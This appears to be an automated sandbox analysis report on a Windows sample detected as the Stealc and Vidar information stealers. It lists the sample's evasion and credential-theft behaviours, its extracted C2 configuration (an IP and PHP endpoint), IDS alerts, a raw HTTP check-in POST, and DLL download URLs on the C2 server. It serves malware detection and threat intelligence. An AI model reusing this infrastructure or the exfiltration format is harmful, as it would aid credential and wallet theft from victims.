Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519697
MD5:	af274b2e6f0b472537f6a2ddd4356070
SHA1:	09ecc220306de02815a7c3bc06c28c44d1a6a33c
SHA256:	66157b51bb3cf15e86bb9726ef16e8453bda847c90c53039933773401c8f4359
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3856 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AF274B2E6F0B472537F6A2DDD4356070)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Threatname: Vidar

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2260490573.0000000000921000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2079463767.0000000004B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 3856	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 3856	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 3856	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3856	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.920000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:14:06.505678+0200	2044245	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49705	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:14:06.497610+0200	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:14:06.736704+0200	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:14:07.733500+0200	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:14:06.746268+0200	2044247	1	Malware Command and Control Activity Detected	185.215.113.37	80	192.168.2.5	49705	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:14:06.193296+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49705	185.215.113.37	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T21:14:08.242746+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:13.185546+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:14.273482+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:14.926896+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:15.543213+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:17.270938+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP
2024-09-26T21:14:17.791806+0200	2803304	3	Unknown Traffic	192.168.2.5	49705	185.215.113.37	80	TCP

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGIIDHJEBGIDHJJDBKEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 34 45 44 35 35 33 38 45 34 30 32 32 31 34 33 33 32 31 36 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 47 49 49 44 48 4a 45 42 47 49 44 48 4a 4a 44 42 4b 45 2d 2d 0d 0a Data Ascii: ------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="hwid"BA4ED5538E402214332168------JDGIIDHJEBGIDHJJDBKEContent-Disposition: form-data; name="build"save------JDGIIDHJEBGIDHJJDBKE--

Source: file.exe, 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dllZ
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/freebl3.dll~
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dll(
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/msvcp140.dllp
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dll$u
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllLocal
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/nss3.dllr
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllL
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/softokn3.dllP
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll17-2476756634-1003gv
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll7
Source: file.exe, 00000000.00000002.2260179261.0000000000753000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/:
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php0u
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3C
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php9e
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpAem
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpMeq
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpieU
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpm
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phppiT
Source: file.exe, 00000000.00000002.2260179261.0000000000736000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpqe=
Source: file.exe, 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phption:
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpx
Source: file.exe, 00000000.00000002.2260179261.00000000006DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37:
Source: file.exe, 00000000.00000002.2260490573.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.37e2b1563c6670f193.phpefox
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2282518597.000000006C6CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2272557365.000000001D435000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2282392158.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ECGHCBGC.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: ECGHCBGC.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ECGHCBGC.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KJDGIJECFIEBFIDHCGHD.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2277322347.0000000029518000.00000004.00000020.00020000.00000000.sdmp, KJDGIJECFIEBFIDHCGHD.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2260179261.0000000000762000.00000004.00000020.00020000.00000000.sdmp, ECGHCBGC.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ECGHCBGC.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2233219605.000000002F6D1000.00000004.00000020.00020000.00000000.sdmp, KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2233219605.000000002F6D1000.00000004.00000020.00020000.00000000.sdmp, KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000002.2260490573.000000000097A000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2233219605.000000002F6D1000.00000004.00000020.00020000.00000000.sdmp, KKJKKJJKJEGIECAKJJEBFBAKKE.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary

PE file contains section with special chars

